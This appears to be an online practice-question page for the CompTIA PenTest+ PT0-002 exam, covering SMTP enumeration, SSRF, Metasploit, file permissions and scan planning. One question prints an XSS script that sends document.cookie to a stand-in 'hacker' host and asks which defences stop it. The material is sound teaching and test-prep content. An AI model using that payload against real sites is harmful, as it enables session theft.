CompTIA PT0-002 CompTIA PenTest+ Certification Exam Online Training
The questions for PT0-002 were last updated on Nov 26, 2024.
- Exam Code: PT0-002
- Exam Name: CompTIA PenTest+ Certification Exam
- Certification Provider: CompTIA
- Latest update: Nov 26, 2024
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active.
Which of the following commands should be used to accomplish the goal?
- A. VRFY and EXPN
- B. VRFY and TURN
- C. EXPN and TURN
- D. RCPT TO and VRFY
Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?
- A. Executive summary of the penetration-testing methods used
- B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
- C. Quantitative impact assessments given a successful software compromise
- D. Code context for instances of unsafe type-casting operations
A penetration tester performs the following command:
curl -I --http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?
- A. Option A
- B. Option B
- C. Option C
- D. Option D
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself.
Which of the following vulnerabilities has the tester exploited?
- A. Cross-site request forgery
- B. Server-side request forgery
- C. Remote file inclusion
- D. Local file inclusion
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks.
Which of the following methodologies should be used to BEST meet the client’s expectations?
- A. OWASP Top 10
- B. MITRE ATT&CK framework
- C. NIST Cybersecurity Framework
- D. The Diamond Model of Intrusion Analysis
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to protect against this type of attack? (Choose two.)
- A. Web-application firewall
- B. Parameterized queries
- C. Output encoding
- D. Session tokens
- E. Input validation
- F. Base64 encoding
A client evaluating a penetration testing company requests examples of its work.
Which of the following represents the BEST course of action for the penetration testers?
- A. Redact identifying information and provide a previous customer’s documentation.
- B. Allow the client to only view the information while in secure spaces.
- C. Determine which reports are no longer under a period of confidentiality.
- D. Provide raw output from penetration testing tools.
Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?
- A. Nessus
- B. Metasploit
- C. Burp Suite
- D. Ettercap
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
- A. chmod u+x script.sh
- B. chmod u+e script.sh
- C. chmod o+e script.sh
- D. chmod o+x script.sh
A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades-old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability.
Which of the following should the penetration tester consider BEFORE running a scan?
- A. The timing of the scan
- B. The bandwidth limitations
- C. The inventory of assets and versions
- D. The type of scan